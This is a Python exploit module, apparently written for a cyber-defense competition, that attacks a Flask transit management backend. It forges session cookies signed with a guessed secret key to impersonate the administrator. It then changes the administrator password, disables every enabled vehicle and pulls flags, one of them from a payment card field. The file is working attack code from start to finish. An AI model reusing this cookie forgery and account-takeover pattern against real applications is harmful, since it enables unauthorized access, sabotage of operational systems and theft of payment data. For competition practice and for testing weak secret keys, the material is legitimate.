import random
import requests
import logging
from typing import Optional
from flask_unsign import decode

from exploit_module.common import USER_AGENT
from exploit_module.common import create_cookie

_logger = logging.getLogger(__name__)

def check_fake_cookie_on_mgmt(domain="http://127.0.0.1:5000", endpoint="/auth/test", username=None) -> bool:
    if username is None:
        # Generate 10 random ascii characters for the username
        username = ''.join(random.choices('abcdefghijklmnopqrstuvwxyz', k=10))

    # Create a cookie with a fake signed secret key
    cookie = create_cookie(username)
    
    # Create the cookie dictionary
    cookies = {
        "session": cookie
    }
    
    url = f"{domain}{endpoint}"
    # Send a request to the admin endpoint with the fake cookie
    response = requests.get(url, cookies=cookies, headers={"User-Agent": USER_AGENT}, verify=False)

    # If the response is 200, then the cookie was accepted. If it is 401, then it was not.
    # TODO: We might also be able to check the response's cookie to check for a username
    if response.status_code == 200:
        if response.json().get("message") != "Success":
            _logger.warning(f"[-] Backend test endpoint on {domain} returned 200 but did not return success message. Response: {response.text}")
        _logger.info(f"[+] Successfully accessed backend test endpoint on {domain} as {username}")
        return True
    else:
        _logger.info(f"[-] Failed to access backend test endpoint on {domain}. HTTP {response.status_code}")
        return False

def change_mgmt_password(username='Administrator', new_password='tacocatcat1234!',
                            domain="http://127.0.0.1:5000", endpoint="/auth/change-password", cookie:Optional[str] = None) -> bool:
    # Generate a cookie with the correct secret key, but with the username set to Administrator
    # The change password endpoint uses a POST where the session's username value is used to determine which user's password to change.
    if cookie is None:
        cookie = create_cookie(username, secret_key='cdc')
    cookies = {
        "session": cookie
    }
    data = {
        "new-password": new_password
    }
    
    url = f"{domain}{endpoint}"
    response = requests.post(url, json=data, cookies=cookies, headers={"User-Agent": USER_AGENT}, verify=False)
    
    if response.status_code != 200:
        _logger.warning(f"[-] Failed to change password on backend at {domain}. HTTP {response.status_code}. Response: {response.text}")
        return False
    else:
        _logger.info(f"[+] Successfully changed password for {username} on backend at {domain}")
        return True

def disable_all_vehicles_on_mgmt(domain="http://localhost:5000", cookie: Optional[str] = None) -> bool:
    if cookie is None:
        cookie = create_cookie("Administrator", secret_key='cdc')
    cookies = {
        "session": cookie
    }
    
    vehicle_data = requests.get(f"{domain}/vehicles", cookies=cookies, headers={"User-Agent": USER_AGENT}, verify=False)
    if vehicle_data.status_code != 200:
        _logger.warning(f"[-] Failed to get vehicle data from backend at {domain}. HTTP {vehicle_data.status_code}. Response: {vehicle_data.text}")
        return False
    vehicles = None
    try:
        vehicles = vehicle_data.json()
    except requests.exceptions.JSONDecodeError as e:
        _logger.warning(f"[-] Failed to decode vehicle data JSON from backend at {domain}. Response: {vehicle_data.text}. Error: {e}")
        return False

    all_disabled = True
    for vehicle in vehicles:
        # If the vehicle is enabled, disable it
        if vehicle.get('status') == True and vehicle.get('id') is not None:
            disable_response = requests.post(f"{domain}/vehicles/{vehicle.get('id')}", json={"status": False}, cookies=cookies, 
                                             headers={"User-Agent": USER_AGENT}, verify=False)
            if disable_response.status_code != 200:
                _logger.warning(f"[-] Failed to disable vehicle with id {vehicle.get('id')} on backend at {domain}. HTTP {disable_response.status_code}. Response: {disable_response.text}")
            else:
                _logger.debug(f"[+] Successfully disabled vehicle with id {vehicle.get('id')} on backend at {domain}")
                all_disabled = False
    return all_disabled

def get_mgmt_train_flag(domain="http://localhost:5000", cookie: Optional[str] = None) -> Optional[str]:
    if cookie is None:
        cookie = create_cookie("Administrator", secret_key='cdc')
    cookies = {
        "session": cookie
    }

    all_disabled = disable_all_vehicles_on_mgmt(domain=domain, cookie=cookie)
    if not all_disabled:
        _logger.warning(f"[-] Not all vehicles were disabled on the backend at {domain}. The train flag may not be accessible.")

    flag_url = f"{domain}/vehicles/train/flag"
    response = requests.get(flag_url, cookies=cookies, headers={"User-Agent": USER_AGENT}, verify=False)
    try:
        json_data = response.json()
        if json_data.get('train_service_flag') is not None:
            flag = json_data.get('train_service_flag')
            _logger.info(f"[+] Successfully got train flag from backend at {domain}: {flag}")
            return flag
        if json_data.get('error') is not None:
            _logger.warning(f"[-] Failed to get train flag from backend at {domain}. Response contained error: {json_data.get('error')}")
            return None
    except requests.exceptions.JSONDecodeError as e:
        _logger.warning(f"[-] Failed to decode JSON response when trying to get train flag from backend at {domain}. Response: {response.text}. Error: {e}")
        return None
    return None

def get_mgmt_bus_flag(domain="http://localhost:5000", cookie: Optional[str] = None) -> Optional[str]:
    if cookie is None:
        cookie = create_cookie("Administrator", secret_key='cdc')
    cookies = {
        "session": cookie
    }
    flag_url = f"{domain}/vehicles/bus/flag"
    
    all_disabled = disable_all_vehicles_on_mgmt(domain=domain, cookie=cookie)
    if not all_disabled:
        _logger.warning(f"[-] Not all vehicles were disabled on the backend at {domain}. The train flag may not be accessible.")

    response = requests.get(flag_url, cookies=cookies, headers={"User-Agent": USER_AGENT}, verify=False)
    try:
        json_data = response.json()
        if json_data.get('bus_service_flag') is not None:
            flag = json_data.get('bus_service_flag')
            _logger.info(f"[+] Successfully got train flag from backend at {domain}: {flag}")
            return flag
        if json_data.get('error') is not None:
            _logger.warning(f"[-] Failed to get train flag from backend at {domain}. Response contained error: {json_data.get('error')}")
            return None
    except requests.exceptions.JSONDecodeError as e:
        _logger.warning(f"[-] Failed to decode JSON response when trying to get train flag from backend at {domain}. Response: {response.text}. Error: {e}")
        return None
    return None

def get_mgmt_db_flag(domain="http://localhost:5000", cookie: Optional[str] = None) -> Optional[str]:
    if cookie is not None:
        # Check that the cookie's username is set to 'blue_flag'
        data = decode(cookie)
        if data.get('username') != 'blue_flag':
            _logger.warning(f"[-] Cookie provided for getting db flag on backend at {domain} does not have the expected username. Re-creating cookie")
            cookie = None
    if cookie is None:
        cookie = create_cookie("blue_flag", secret_key='cdc')

    cookies = {
        "session": cookie
    }
    
    flag_url = f"{domain}/payment-info"

    response = requests.get(flag_url, cookies=cookies, headers={"User-Agent": USER_AGENT}, verify=False)
    if response.status_code != 200:
        _logger.warning(f"[-] Failed to get db flag from backend at {domain}. HTTP {response.status_code}. Response: {response.text}")
        return None
    try:
        json_data = response.json()
        if json_data.get('card_number') is not None:
            flag = json_data.get('card_number')
            _logger.info(f"[+] Successfully got db flag from backend at {domain}: {flag}")
            return flag
        if json_data.get('error') is not None:
            _logger.warning(f"[-] Failed to get db flag from backend at {domain}. Response contained error: {json_data.get('error')}")
            return None
    except requests.exceptions.JSONDecodeError as e:
        _logger.warning(f"[-] Failed to decode JSON response when trying to get db flag from backend at {domain}. Response: {response.text}. Error: {e}")
        return None
    return None

